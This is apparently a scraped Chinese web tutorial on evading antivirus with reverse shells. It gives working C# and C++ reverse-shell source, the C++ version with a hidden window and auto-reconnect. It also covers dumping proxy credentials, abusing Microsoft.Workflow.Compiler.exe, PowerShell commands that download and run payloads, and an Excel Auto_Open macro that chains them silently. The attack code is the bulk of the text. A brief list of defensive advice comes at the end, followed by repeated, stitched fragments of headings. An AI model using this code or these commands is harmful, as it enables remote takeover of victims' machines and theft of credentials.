利用C++和C#绕过AV检测的技术教学文档<\/h1>

1. 简介<\/h2>
本文详细介绍了多种使用C++和C#编写反向shell并绕过杀毒软件(AV)检测的技术方法。这些技术在2018年时能够有效绕过主流杀毒软件的检测，包括Windows Defender。<\/p>

2. C#简单反向Shell<\/h2>

2.1 基本实现<\/h3>

使用C#编写简单的反向shell程序，通过套接字连接并在受害者机器上启动cmd.exe：<\/p>

\/\/ 示例代码结构（简化版）<\/span>
<\/span><\/span>using<\/span> System;
<\/span><\/span>using<\/span> System.Diagnostics;
<\/span><\/span>using<\/span> System.Net.Sockets;
<\/span><\/span>using<\/span> System.IO;
<\/span><\/span>
<\/span><\/span>class<\/span> ReverseShell<\/span>
<\/span><\/span>{
<\/span><\/span>    static<\/span> void<\/span> Main()
<\/span><\/span>    {
<\/span><\/span>        using(TcpClient client = new<\/span> TcpClient("攻击者IP"<\/span>, 端口<\/span>))
<\/span><\/span>        {
<\/span><\/span>            using(Stream stream = client.GetStream())
<\/span><\/span>            {
<\/span><\/span>                using(StreamReader reader = new<\/span> StreamReader(stream))
<\/span><\/span>                {
<\/span><\/span>                    using(StreamWriter writer = new<\/span> StreamWriter(stream))
<\/span><\/span>                    {
<\/span><\/span>                        Process cmd = new<\/span> Process();
<\/span><\/span>                        cmd.StartInfo.FileName = "cmd.exe"<\/span>;
<\/span><\/span>                        cmd.StartInfo.RedirectStandardInput = true<\/span>;
<\/span><\/span>                        cmd.StartInfo.RedirectStandardOutput = true<\/span>;
<\/span><\/span>                        cmd.StartInfo.UseShellExecute = false<\/span>;
<\/span><\/span>                        cmd.Start();
<\/span><\/span>                        
<\/span><\/span>                        writer.AutoFlush = true<\/span>;
<\/span><\/span>                        
<\/span><\/span>                        while<\/span>(!reader.EndOfStream)
<\/span><\/span>                        {
<\/span><\/span>                            string<\/span> input = reader.ReadLine();
<\/span><\/span>                            cmd.StandardInput.WriteLine(input);
<\/span><\/span>                            string<\/span> output = cmd.StandardOutput.ReadToEnd();
<\/span><\/span>                            writer.WriteLine(output);
<\/span><\/span>                        }
<\/span><\/span>                    }
<\/span><\/span>                }
<\/span><\/span>            }
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2.2 编译方法<\/h3>
使用VSCode和C#插件编译：<\/p>
dotnet build -r win-x64
<\/span><\/span><\/code><\/pre>2.3 特点<\/h3>

简单直接<\/li>
无持久性<\/li>
无隐藏性<\/li>
cmd窗口对用户可见<\/li>
一端关闭连接即断开<\/li>
<\/ul>
2.4 检测结果<\/h3>

Windows Defender未检测到威胁<\/li>
当时主流AV均未标记为恶意<\/li>
<\/ul>
3. C++反向Shell（带持久性）<\/h2>
3.1 代码特点<\/h3>
基于@NinjaParanoid的代码实现，具有以下优点：<\/p>

通过while循环实现5秒自动重连<\/li>
隐藏cmd窗口<\/li>
支持参数传递（可动态改变攻击者IP）<\/li>
<\/ol>
3.2 关键代码结构<\/h3>
#include<\/span> <winsock2.h><\/span>
<\/span><\/span><\/span>#include<\/span> <windows.h><\/span>
<\/span><\/span><\/span>#include<\/span> <ws2tcpip.h><\/span>
<\/span><\/span><\/span>#pragma comment(lib, "Ws2_32.lib")
<\/span><\/span><\/span>#define DEFAULT_BUFLEN 1024
<\/span><\/span><\/span><\/span>
<\/span><\/span>void<\/span> ReverseShell<\/span>(const<\/span> char<\/span>*<\/span> C2Server, int<\/span> C2Port) {
<\/span><\/span>    while<\/span>(true) {
<\/span><\/span>        Sleep(5000<\/span>);
<\/span><\/span>        
<\/span><\/span>        SOCKET mySocket;
<\/span><\/span>        sockaddr_in addr;
<\/span><\/span>        WSADATA version;
<\/span><\/span>        WSAStartup(MAKEWORD(2<\/span>,2<\/span>), &<\/span>version);
<\/span><\/span>        
<\/span><\/span>        mySocket =<\/span> WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0<\/span>, 0<\/span>);
<\/span><\/span>        addr.sin_family =<\/span> AF_INET;
<\/span><\/span>        addr.sin_addr.s_addr =<\/span> inet_addr(C2Server);
<\/span><\/span>        addr.sin_port =<\/span> htons(C2Port);
<\/span><\/span>        
<\/span><\/span>        if<\/span>(WSAConnect(mySocket, (SOCKADDR*<\/span>)&<\/span>addr, sizeof<\/span>(addr), NULL, NULL, NULL, NULL) ==<\/span> SOCKET_ERROR) {
<\/span><\/span>            closesocket(mySocket);
<\/span><\/span>            WSACleanup();
<\/span><\/span>            continue<\/span>;
<\/span><\/span>        }
<\/span><\/span>        
<\/span><\/span>        char<\/span> RecvData[DEFAULT_BUFLEN];
<\/span><\/span>        memset(RecvData, 0<\/span>, sizeof<\/span>(RecvData));
<\/span><\/span>        int<\/span> RecvCode =<\/span> recv(mySocket, RecvData, DEFAULT_BUFLEN, 0<\/span>);
<\/span><\/span>        
<\/span><\/span>        if<\/span>(RecvCode <=<\/span> 0<\/span>) {
<\/span><\/span>            closesocket(mySocket);
<\/span><\/span>            WSACleanup();
<\/span><\/span>            continue<\/span>;
<\/span><\/span>        }
<\/span><\/span>        
<\/span><\/span>        STARTUPINFO sinfo;
<\/span><\/span>        PROCESS_INFORMATION pinfo;
<\/span><\/span>        memset(&<\/span>sinfo, 0<\/span>, sizeof<\/span>(sinfo));
<\/span><\/span>        sinfo.cb =<\/span> sizeof<\/span>(sinfo);
<\/span><\/span>        sinfo.dwFlags =<\/span> STARTF_USESTDHANDLES |<\/span> STARTF_USESHOWWINDOW;
<\/span><\/span>        sinfo.hStdInput =<\/span> sinfo.hStdOutput =<\/span> sinfo.hStdError =<\/span> (HANDLE)mySocket;
<\/span><\/span>        sinfo.wShowWindow =<\/span> SW_HIDE;
<\/span><\/span>        
<\/span><\/span>        CreateProcess(NULL, "cmd.exe"<\/span>, NULL, NULL, TRUE, 0<\/span>, NULL, NULL, &<\/span>sinfo, &<\/span>pinfo);
<\/span><\/span>        WaitForSingleObject(pinfo.hProcess, INFINITE);
<\/span><\/span>        
<\/span><\/span>        CloseHandle(pinfo.hProcess);
<\/span><\/span>        CloseHandle(pinfo.hThread);
<\/span><\/span>        memset(RecvData, 0<\/span>, sizeof<\/span>(RecvData));
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>(int<\/span> argc, char<\/span>**<\/span> argv) {
<\/span><\/span>    if<\/span>(argc ==<\/span> 3<\/span>) {
<\/span><\/span>        ReverseShell(argv[1<\/span>], atoi(argv[2<\/span>]));
<\/span><\/span>    } else<\/span> {
<\/span><\/span>        ReverseShell("默认攻击者IP"<\/span>, 默认端口<\/span>);
<\/span><\/span>    }
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3.3 特点<\/h3>

后台进程自动重连<\/li>
无可见窗口<\/li>
支持参数化配置<\/li>
当时主流AV未检测到威胁<\/li>
<\/ul>
4. 使用代理凭据反弹C# Shell<\/h2>
4.1 技术原理<\/h3>

从Credential Manager dump代理凭据（无需管理员权限）<\/li>
Base64编码凭据<\/li>
将凭据插入代理授权连接<\/li>
<\/ol>
4.2 实现要点<\/h3>

需要目标公司代理IP\/PORT<\/li>
依赖Credential Manager中保存的凭据<\/li>
失败率高（若无保存凭据则失败）<\/li>
当时可绕过企业AV检测<\/li>
<\/ul>
5. 利用Microsoft.Workflow.Compiler.exe执行C#代码<\/h2>
5.1 技术背景<\/h3>
利用Microsoft.Workflow.Compiler.exe服务执行未签名代码的技术。<\/p>
5.2 实现步骤<\/h3>

创建REV.txt文件（XOML结构）：<\/li>
<\/ol>
<Workflow><\/span>
<\/span><\/span>    <Sequential><\/span>
<\/span><\/span>        <Code<\/span> x:TypeArguments=<\/span>"x:String"<\/span> Execute=<\/span>"<![CDATA[
<\/span><\/span><\/span>            \/\/ 此处为C#反向Shell代码
<\/span><\/span><\/span>        ]]>"<\/span> \/><\/span>
<\/span><\/span>    <\/Sequential><\/span>
<\/span><\/span><\/Workflow><\/span>
<\/span><\/span><\/code><\/pre>

创建Rev.Shell文件（包含完整的C#反向Shell代码）<\/p>
<\/li>

执行命令：<\/p>
<\/li>
<\/ol>
C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell<\/span>
<\/span><\/span><\/code><\/pre>5.3 PowerShell自动化实现<\/h3>
powershell -command "&{(New-Object Net.WebClient).DownloadFile('https:\/\/example.com\/REV.txt','.\REV.txt')}"<\/span> && 
<\/span><\/span>powershell -command "&{(New-Object Net.WebClient).DownloadFile('https:\/\/example.com\/Rev.Shell','.\Rev.Shell')}"<\/span> && 
<\/span><\/span>C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
<\/span><\/span><\/code><\/pre>5.4 特点<\/h3>

利用合法微软工具执行恶意代码<\/li>
创建临时DLL可能被检测<\/li>
当时可绕过AV对PowerShell的监控<\/li>
<\/ul>
6. Excel宏结合PowerShell和C#<\/h2>
6.1 实现方式<\/h3>
在Excel宏中嵌入上述PowerShell命令：<\/p>
Sub Auto_Open()
    Dim str As String
    str = "powershell -command ""&{(New-Object Net.WebClient).DownloadFile('https:\/\/example.com\/REV.txt','.\REV.txt')}"" && " & _
          "powershell -command ""&{(New-Object Net.WebClient).DownloadFile('https:\/\/example.com\/Rev.Shell','.\Rev.Shell')}"" && " & _
          "C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell"
    Shell str, vbHide
End Sub
<\/code><\/pre>
6.2 检测结果<\/h3>

当时AV仅检测到宏启动PowerShell的行为<\/li>
未检测实际恶意负载<\/li>
通过混淆可进一步提高绕过率<\/li>
<\/ul>
7. 技术总结与防御建议<\/h2>
7.1 技术趋势<\/h3>

越来越多的攻击转向使用C#或C#与PowerShell组合<\/li>
利用合法系统工具（如Microsoft.Workflow.Compiler.exe）执行恶意代码<\/li>
结合多种技术提高绕过率<\/li>
<\/ul>
7.2 防御建议<\/h3>

应用程序白名单：限制非授权程序执行<\/li>
监控异常进程行为：如cmd.exe异常网络连接<\/li>
限制PowerShell使用：仅允许签名脚本执行<\/li>
系统工具监控：关注Microsoft.Workflow.Compiler.exe等工具的异常使用<\/li>
凭证管理：避免在Credential Manager中存储敏感凭据<\/li>
网络流量分析：检测异常外连行为<\/li>
多层次防御：结合行为检测和签名检测<\/li>
<\/ol>
7.3 攻击演进<\/h3>
这些技术展示了攻击者如何：<\/p>

从简单的脚本转向编译型语言<\/li>
利用系统信任的合法工具<\/li>
结合多种技术提高隐蔽性<\/li>
针对企业特定环境（如代理）定制攻击<\/li>
<\/ul>
通过理解这些技术原理，防御者可以更好地构建防御体系，检测和预防类似攻击。<\/p>

利用C++和C#绕过AV检测的技术教学文档<\/h1>

1. 简介<\/h2> 本文详细介绍了多种使用C++和C#编写反向shell并绕过杀毒软件(AV)检测的技术方法。这些技术在2018年时能够有效绕过主流杀毒软件的检测，包括Windows Defender。<\/p>

2. C#简单反向Shell<\/h2>

3. C++反向Shell（带持久性）<\/h2>

4. 使用代理凭据反弹C# Shell<\/h2>

5. 利用Microsoft.Workflow.Compiler.exe执行C#代码<\/h2>

5.1 技术背景<\/h3> 利用Microsoft.Workflow.Compiler.exe服务执行未签名代码的技术。<\/p>

6. Excel宏结合PowerShell和C#<\/h2>

7. 技术总结与防御建议<\/h2>

1. 简介<\/h2>
本文详细介绍了多种使用C++和C#编写反向shell并绕过杀毒软件(AV)检测的技术方法。这些技术在2018年时能够有效绕过主流杀毒软件的检测，包括Windows Defender。<\/p>

5.1 技术背景<\/h3>
利用Microsoft.Workflow.Compiler.exe服务执行未签名代码的技术。<\/p>